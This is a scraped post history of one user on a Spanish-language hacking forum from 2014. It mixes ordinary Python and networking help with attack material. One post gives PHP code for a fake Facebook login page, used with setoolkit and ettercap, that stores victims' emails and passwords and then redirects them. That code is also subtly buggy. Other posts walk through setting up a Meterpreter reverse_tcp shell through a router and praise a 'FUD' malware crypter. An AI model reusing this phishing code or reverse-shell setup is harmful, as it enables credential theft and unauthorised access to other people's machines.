Port triggering te permite automatizar el port forwarding. Intenta con eso pero yo te recomiendo hacerlo manualmente.
Que marca y modelo tiene tu router?
Que marca y modelo tiene tu router?
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#122
Dudas y pedidos generales / Re:[PROBLEMA] Pagina Web Mia
Diciembre 06, 2014, 02:11:50 AM
Es como dice Hu3c0, debes hacer un port forwarding. Para hacerlo tendrás q meterte al router y buscar la sección correspondiente. Una vez allí, colocas la ip de tu pc y el puerto q vas a 'forwardear'.
Espero q te sirva!
Saludos!
WhiZ
Espero q te sirva!
Saludos!
WhiZ
#123
Dudas y pedidos generales / Re:[Python] Compilar a exe desde linux
Noviembre 28, 2014, 01:32:15 AM
Hola $francisco! Espero que You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login y You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login te sirva.
Saludos!
WhiZ
Saludos!
WhiZ
#124
Dudas y pedidos generales / Re:Ayuda redirigir ip publica setoolkit con ettercap
Noviembre 26, 2014, 09:44:08 AM
Supongamos que tenés las siguientes páginas en tu server:
- You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
- You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
La página login.php es el fake:
En el login_form tenés que reemplazar el valor de action por "You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
En save.php guardás los datos (en archivo local, por mail o en db) y luego redireccionas con la función header:
Código: php
Disculpá que no pueda explicarlo detalladamente pero no tengo mucho tiempo. Espero que te sirva de algo.
Saludos!
WhiZ
- You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
- You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
La página login.php es el fake:
En el login_form tenés que reemplazar el valor de action por "You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
En save.php guardás los datos (en archivo local, por mail o en db) y luego redireccionas con la función header:
<?php
$email = $_POST["email"];
$pass = $_POST["pass"];
if ((empty($email)) or ("$pass")) {
header("Location: http://127.0.0.1/login.php", true, 301);
} else {
$file = fopen("data", "a+");
fwrite("Email: ".$email."\r\nPass: ".$pass."\r\n---------------------------------------\r\n");
fclose($file);
header("Location: https://www.facebook.com", true, 301);
}
die();
?>[/php]Disculpá que no pueda explicarlo detalladamente pero no tengo mucho tiempo. Espero que te sirva de algo.
Saludos!
WhiZ
#125
Dudas y pedidos generales / Re:Ayuda redirigir ip publica setoolkit con ettercap
Noviembre 25, 2014, 09:55:50 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginNo hace falta un tutorial. Simplemente lo haces con la función header.
Whiz conoces algún tutorial o algún sitio donde lo explique ?
header ("Location https://www.facebook.com", true, 301);
die (); Espero q te sirva.
Saludos!
WhiZ
#126
Dudas y pedidos generales / Re:Ayuda redirigir ip publica setoolkit con ettercap
Noviembre 25, 2014, 04:11:33 PM
Podes hacerlo con php.
Saludos!
WhiZ
Saludos!
WhiZ
#127
Dudas y pedidos generales / Re:[DUDA] Meterpreter/reverse_tcp
Noviembre 23, 2014, 01:07:43 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
WhiZ si ya abri los puertos 4444 en la 192.168.1.130 y en la 192.168.1.132 TCP
Disculpame que te pregunte nuevamente pero quiero aclarar para ver si resolvemos este problema. Ya abriste los puertos en windows, kali y el router, no? Hiciste además el port forwarding?
En realidad lo que hay que hacer para que funcione es:
- Abrir el puerto 4444 en el router
- Hacer port forwarding (redirigir el tráfico entrante por el puerto 4444 del router al puerto 4444 de la PC con Kali (192.168.1.132)).
- Poner a la escucha el servidor de Kali
- Ejecutar el exploit en la PC con Windows
Si no te funciona esto, probá con LHOST = 192.168.1.130 y comentanos qué sucede.
Saludos!
WhiZ
#128
Dudas y pedidos generales / Re:[DUDA] Meterpreter/reverse_tcp
Noviembre 23, 2014, 09:39:08 AMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
LHOST=MI IP EXTERNA
LPORT=4444
Abro armigate, Listener -> 4444 Meterpreter
Luego Abro puertos 192.168.1.130(win7) 192.168.1.132(kali linux) TCP 4444 y en gufw igual.
Lo ejecutan y no me llega la conexion, porque es posible? muchas gracias.
Si utilizas tu IP pública, entonces deberás abrir también el puerto 4444 en el router y hacer un port-forwarding.
Saludos!
WhiZ
#129
Front-end / Re:Consola Interactiva (básica)
Noviembre 09, 2014, 03:31:40 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
WhiZ sabes que te aprecio, pero no pienso mentirte, como lo puedo decir...
Esto es más bien un decorado, no tiene mucha utilidad y realmente es solo una emulación.
No obstante se ve muy lindo no lo niego xD
Jeje si. Totalmente cierto. Para darle funcionalidad tendría que hacerlo con php, python, ruby o cualquier lenguaje pero lo hice en javascript porq le estoy "enseñando" desarrollo web a mi cuñada (que es diseñadora gráfica y quiere meterse en esto). Ella ya sabe bastante de html y css, asíq quería introducirla en algún lenguaje que le permita dar dinamismo a la página. Al principio no sabía si js o php/django pero finalmente, por ser más sencillo, me decliné por js.
De todas formas, al terminar con la consola me dijo que no había entendido nada jaja. Asíq voy a tener que recurrir a otros métodos xD
Saludos chicos y gracias por las observaciones!
WhiZ
#130
Wargames y retos / Re:Underc0de Weekend #2 [Solucionario]
Noviembre 08, 2014, 06:44:32 PM
Antes que nada quiero agradecer y felicitar a [Q]3rV[0] por este excelente reto (te pasaste) y a hdbreaker por tan buen solucionario (no te das una idea de lo mucho que aprendí con él). Es admirable el trabajo que han realizado.
En mi caso, nunca había hecho ningún reto similar. A partir de ahora voy a ver si practico un poco con los de los links (una vez más, gracias [Q]3rV[0]).
Ojalá podamos mantener retos de esta calidad. Realmente se aprende muchísimo con ellos.
Sigamos así!
Saludos!
WhiZ
En mi caso, nunca había hecho ningún reto similar. A partir de ahora voy a ver si practico un poco con los de los links (una vez más, gracias [Q]3rV[0]).
Ojalá podamos mantener retos de esta calidad. Realmente se aprende muchísimo con ellos.
Sigamos así!
Saludos!
WhiZ
#131
Cursos, manuales y libros / [Libro] Hacking - The art of exploitation (2nd Edition)
Noviembre 05, 2014, 10:34:13 PM
Descripción
El hacking es el arte de resolver problemas de forma creativa, tanto si eso significa encontrar una solución poco convencional para un problema complicado como si se trata de aprovechar los agujeros de una programación descuidada. Muchas personas se autodenominan hackers, pero pocos tienen los conocimientos técnicos necesarios para realmente ponerlo a prueba.
En lugar de simplemente enseñar a usar las vulnerabilidades existentes, el autor, Jon Erickson, explica cómo funcionan las complejas técnicas de hacking, mostrando los fundamentos de la programación en C desde el punto de vista de un hacker.
Podemos ponernos manos a la obra depurando código, desbordando búferes, secuestrando comunicaciones de red, esquivando protecciones, aprovechando debilidades en contraseñas y quizás, incluso descubriendo nuevas vulnerabilidades.
Detalles del libro
Editor: No Starch Press
Por: Jon Erickson
ISBN: 978-1-59327-144-2
Año: 2008
Páginas: 488
Lenguaje: Inglés
Tabla de contenidos
Capítulo 0x100: Introduction
Capítulo 0x200: Programming
Capítulo 0x300: Exploitation
Capítulo 0x400: Networking
Capítulo 0x500: Shellcode
Capítulo 0x600: Countermeasures
Capítulo 0x700: Cryptography
Capítulo 0x800: Conclusion
Acerca del autor
Jon Erickson tiene una educación formal en ciencias de la computación y habla con frecuencia en conferencias de seguridad informática de todo el mundo. Él trabaja como especialista criptógrafo y la seguridad en el norte de California
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Saludos!
WhiZ
#132
Wargames y retos / Re:Underc0de Weekend #2
Noviembre 01, 2014, 09:57:15 PM
Grande [Q]3rV[0]! Muy bueno el reto!
Justo este finde estoy sin PC pero la semana q viene lo pruebo.
Saludos!
WhiZ
Justo este finde estoy sin PC pero la semana q viene lo pruebo.
Saludos!
WhiZ
#133
Análisis y desarrollo de malwares / Re:Goku Crypter FUD [LIBRE]
Noviembre 01, 2014, 12:40:53 PM
Jaja más verde imposible.
Excelente trabajo baku. Gracias por compartir!
Saludos!
WhiZ
Excelente trabajo baku. Gracias por compartir!
Saludos!
WhiZ
#134
Talleres Underc0de / Re:Taller de Python #3
Octubre 31, 2014, 09:00:35 AMRESOLUCIÓN DE PRÁCTICAS
Hola gente! Aquí les dejo un videotutorial que hice explicando cómo resolver las prácticas de esta tercera entrega. Hay muchas cosas que podría haber explicado mientras hacía el video pero se me hacía muy largo, por eso decidí explicarlo codeando.
Hay algunas cosas que utilizo en el video que todavía no fueron explicadas en los talleres (por ej., el manejo de errores); lo dejo para que investiguen jeje. Al final del video les dejo más tarea. Traten de hacerlo que, al aprender un lenguaje, nada ayuda más que la práctica.
Cualquier duda o pregunta que quieran hacer, pueden hacerlo en este mismo post.
Espero que les guste!
P.D.: Aquí les dejo el código...
# -*- coding: utf-8 -*-
### GENERAL ###
PESTANIAS = {
0 : "http://underc0de.org",
1 : "+",
}
NAVBAR = None
LOGIN_FORM = {
"user" : "",
"passwd" : "",
"iniciar sesión" : False,
}
AREA_DE_TRABAJO = {
"header" : LOGIN_FORM,
"nav" : ["inicio", "noticias", "contacto"],
"section" : {"article1":"", "article2":""},
"footer" : "",
}
NAVEGADOR = [
"barra de título",
"barra de menú",
"barra de herramientas",
PESTANIAS,
NAVBAR,
AREA_DE_TRABAJO,
"barra de estado",
]
### NUEVAS PESTAÑAS ###
def abrirNuevaPestania():
# identificamos sector de pestañas
print " [*] Identificando sector de pestañas"
pestanias = identificarPestanias()
if not pestanias:
print " [!] Error"
return
print " [+] OK"
# clickeamos última pestaña
print " [*] Clickeando última pestaña"
pestanias = clickearUltimaPestania(pestanias)
if type(pestanias) is not dict:
print " [!] Error: %s" % pestanias
return
global PESTANIAS
PESTANIAS = pestanias
print " [+] OK"
def identificarPestanias():
for elemento in NAVEGADOR:
if elemento is PESTANIAS:
return PESTANIAS
return None
def clickearUltimaPestania(pestanias):
try:
numPestanias = len(pestanias)
if numPestanias == 0:
raise Exception("No hay pestañas disponibles")
pestanias[numPestanias-1], pestanias[numPestanias] = "about:blank", "+"
return pestanias
except Exception as e:
return e.message
### NUEVA PÁGINA ###
def abrirPagina(pagina):
# identificamos barra de direcciones
print " [*] Identificando barra de navegación"
navbar = identificarNavBar()
if not navbar:
print " [!] Error"
return
print " [+] OK"
# ingresamos url
print " [*] Ingresando URL"
try:
global NAVBAR
NAVBAR = pagina
print " [+] OK"
except Exception as e:
print " [!] Error:", e
return
def identificarNavBar():
for elemento in NAVEGADOR:
if elemento is NAVBAR:
return True
return False
### INGRESAR CREDENCIALES ###
def ingresarCredenciales(user, passwd):
# identificando login form
print " [*] Identificando login form"
form = AREA_DE_TRABAJO.get("header")
if not form:
print " [!] Error"
return
print " [+] OK"
# ingresando credenciales
print " [+] Ingresando credenciales"
try:
form["user"], form["passwd"] = user, passwd
print " [+] OK"
except Exception as e:
print " [!] Error:", e
return
# clickeando botón 'Iniciar sesión'
print " [*] Clickeando botón 'Iniciar sesión'"
try:
form["iniciar sesión"] = True
print " [+] OK"
except Exception as e:
print " [!] Error:", e
return
if __name__ == "__main__":
# Aquí hagan el menú ;)Saludos!
WhiZ
#135
Python / Re:[Python-CGI] PC Control Remoto - JaAViEr
Octubre 30, 2014, 09:35:51 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
pregunta : se puede entrar al server desde otra red de otro pais , o solo desde el internet de tu casa , porque yo hice algo asi en perl llamado Commander que esta publicado en el foro y me pasaba eso solo podia entrar desde mi propia red Wifi.
Eso debe ser por el "socket.gethostbyname(socket.gethostname())". En vez de eso se puede usar una cadena vacía o "0.0.0.0".
En este caso, habría que modificar eso en el código para que funcione fuera de la red local.
Saludos!
WhiZ
#136
Python / Re:[Python-CGI] PC Control Remoto - JaAViEr
Octubre 30, 2014, 11:42:55 AM
Está excelente JaAViEr! Cuando llegue a casa pruebo todo.
+1
Saludos!
WhiZ
+1
Saludos!
WhiZ
#137
Dudas y pedidos generales / Re:Ayuda Con Diccionario
Octubre 28, 2014, 08:26:37 AM
Acá te dejo algo en python.
Código: python
Lo escribí desde el cel asiq es probable q tenga algún error jeje. Además, no miré bien la longitud del número pero eso lo podes corregir cambiando los valores de las variables inicial y final.
Espero q te sirva.
Saludos!
WhiZ
inicial = 900000000 # acá va el valor inicial
final = 1000000000 # valor final
f = open ("dic.txt","w")
for i in range (inicial, final):
línea = "0%s\n" % i
f.write(linea)
f.close ()
Lo escribí desde el cel asiq es probable q tenga algún error jeje. Además, no miré bien la longitud del número pero eso lo podes corregir cambiando los valores de las variables inicial y final.
Espero q te sirva.
Saludos!
WhiZ
#138
Dudas y pedidos generales / Re:Python y HTML
Octubre 26, 2014, 03:42:20 PM
Hola Cr4id3r! Te recomiendo que te leas, al menos, los primeros 7 capítulos de You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login (aunque una vez leídos, seguro que vas a ir por más).
El libro contiene 20 capítulos y trata de Django, un web framework muy fácil de implementar, con muy buena documentación y con una sistema de trabajo muy pythónico.
Estoy seguro de que te va a servir.
Saludos!
WhiZ
El libro contiene 20 capítulos y trata de Django, un web framework muy fácil de implementar, con muy buena documentación y con una sistema de trabajo muy pythónico.
Estoy seguro de que te va a servir.
Saludos!
WhiZ
#139
Talleres Underc0de / Re:Taller de Seguridad Web #4
Octubre 20, 2014, 11:37:48 AM
Felicitaciones arthusu! Está excelente el taller! Ataques avanzados de rápida comprensión gracias a la didáctica del texto.
+1
Saludos!
WhiZ
+1
Saludos!
WhiZ
#140
Talleres Underc0de / Re:Taller de pentesting con Kali Linux - Parte I
Octubre 20, 2014, 11:29:44 AM
Excelente Snifer! Está buenísimo el taller!
Te dejo +1 y esperemos que el próximo salga pronto.
Saludos!
WhiZ
Te dejo +1 y esperemos que el próximo salga pronto.
Saludos!
WhiZ
